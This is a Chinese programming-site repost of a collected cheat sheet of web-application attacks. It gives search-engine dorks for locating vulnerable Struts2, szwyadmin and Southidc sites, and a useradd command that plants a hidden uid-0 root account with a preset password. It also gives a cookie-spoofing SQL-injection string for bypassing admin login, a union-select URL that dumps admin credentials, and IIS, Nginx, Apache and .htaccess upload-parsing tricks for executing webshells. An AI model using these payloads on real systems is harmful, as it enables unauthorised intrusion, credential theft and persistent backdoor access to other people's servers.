热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

phpweb程序漏洞,各种web程序漏洞

收集整理的各种web漏洞struts2:Inurl:index.actionInurl:商城.actionInurl:index.action标题:apachestruts2Inu

收集整理的各种web漏洞

struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 标题:apache struts2

Inurl:action?id=

site:.com inurl:index.action

inurl:dhis-web-commons

利用工具操作,账号密码添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0

账号:bingdao

密码:1

生成加密密码详情:

以下为生成加密密码命令(第一个1就是密码):

echo "1" | openssl passwd -1 -salt $(

生成的加密密码:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/

然后添加权限为root的账号和上面的密码:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'

就得到了账号为“lengyu”,密码为“1”的用户,然后再ssh上去

------------------------------------------------------

szwyadmin COOKIEs欺骗:

inurl:szwyadmin/login.asp

inurl:szwyadmin

代码:Javascript:alert(document.COOKIE="adminuser="+escape("'or'='or'"));Javascript:alert(document.COOKIE="adminpass="+escape("'or'='or'"));Javascript:alert(document.COOKIE="admindj="+escape("1"));

代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。

另外这套程序还有一个爆密码的oday。

使用方法很简单。直接填写域名然后点击爆密码。~~~  直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方数据:

inurl:HrDemand.asp

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

爆库:

inurl:conn.asp

----------------

iis6 解析漏洞:

目录解析  /xx.asp/xx.jpg

说明:在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

文件解析  1.asp;.jpg

说明:会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种

/1.asa

/1.cer

/1.cdx

-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞&#xff1a;

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg&#xff0c;内容为

&#39;);?>

的文件&#xff0c;然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php

------------------------------------------------------------------

Nginx <8.03 空字节代码执行漏洞:

影响版:0.5.,0.6., 0.7 <&#61; 0.7.65, 0.8 <&#61; 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

----------------

Apache 解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

---------------------------------------------------

在windows环境下&#xff0c;xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的&#xff0c;若这样命名&#xff0c;windows会默认除去空格或点,***可以通过抓包&#xff0c;在文件名后加一个空格或者点绕过黑名单.若上传成功&#xff0c;空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

SetHandler application/x-httpd-php

然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件



推荐阅读
  • 本文介绍了如何利用HTTP隧道技术在受限网络环境中绕过IDS和防火墙等安全设备,实现RDP端口的暴力破解攻击。文章详细描述了部署过程、攻击实施及流量分析,旨在提升网络安全意识。 ... [详细]
  • 深入理解:AJAX学习指南
    本文详细探讨了AJAX的基本概念、工作原理及其在现代Web开发中的应用,旨在为初学者提供全面的学习资料。 ... [详细]
  • Web动态服务器Python基本实现
    Web动态服务器Python基本实现 ... [详细]
  • 在对WordPress Duplicator插件0.4.4版本的安全评估中,发现其存在跨站脚本(XSS)攻击漏洞。此漏洞可能被利用进行恶意操作,建议用户及时更新至最新版本以确保系统安全。测试方法仅限于安全研究和教学目的,使用时需自行承担风险。漏洞编号:HTB23162。 ... [详细]
  • 本文详细介绍了Oracle 11g中的创建表空间的方法,以及如何设置客户端和服务端的基本配置,包括用户管理、环境变量配置等。 ... [详细]
  • 本文详细介绍了如何在Oracle VM VirtualBox中实现主机与虚拟机之间的数据交换,包括安装Guest Additions增强功能,以及如何利用这些功能进行文件传输、屏幕调整等操作。 ... [详细]
  • 2023年,Android开发前景如何?25岁还能转行吗?
    近期,关于Android开发行业的讨论在多个平台上热度不减,许多人担忧其未来发展。本文将探讨当前Android开发市场的现状、薪资水平及职业选择建议。 ... [详细]
  • 我的读书清单(持续更新)201705311.《一千零一夜》2006(四五年级)2.《中华上下五千年》2008(初一)3.《鲁滨孙漂流记》2008(初二)4.《钢铁是怎样炼成的》20 ... [详细]
  • 解决PHP项目在服务器无法抓取远程网页内容的问题
    本文探讨了在使用PHP进行后端开发时,遇到的一个常见问题:即在本地环境中能够正常通过CURL获取远程网页内容,但在服务器上却无法实现。我们将分析可能的原因并提供解决方案。 ... [详细]
  • 解决JavaScript中法语字符排序问题
    在开发一个使用JavaScript、HTML和CSS的Web应用时,遇到从SQLite数据库中提取的法语词汇排序不正确的问题,特别是带重音符号的字母未按预期排序。 ... [详细]
  • 在尝试通过自定义端口部署Spring Cloud Eureka时遇到了连接失败的问题。本文详细描述了问题的现象,并提供了有效的解决方案,以帮助遇到类似情况的开发者。 ... [详细]
  • Beetl是一款先进的Java模板引擎,以其丰富的功能、直观的语法、卓越的性能和易于维护的特点著称。它不仅适用于高响应需求的大型网站,也适合功能复杂的CMS管理系统,提供了一种全新的模板开发体验。 ... [详细]
  • 从CodeIgniter中提取图像处理组件
    本指南旨在帮助开发者在未使用CodeIgniter框架的情况下,如何独立使用其强大的图像处理功能,包括图像尺寸调整、创建缩略图、裁剪、旋转及添加水印等。 ... [详细]
  • 本文探讨了如何通过Service Locator模式来简化和优化在B/S架构中的服务命名访问,特别是对于需要频繁访问的服务,如JNDI和XMLNS。该模式通过缓存机制减少了重复查找的成本,并提供了对多种服务的统一访问接口。 ... [详细]
  • 本文档详细介绍了软通动力Java开发工程师职位的笔试题目,涵盖了Java基础、集合框架、JDBC、JSP等内容,并提供了详细的答案解析。 ... [详细]
author-avatar
手机用户2602938293
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有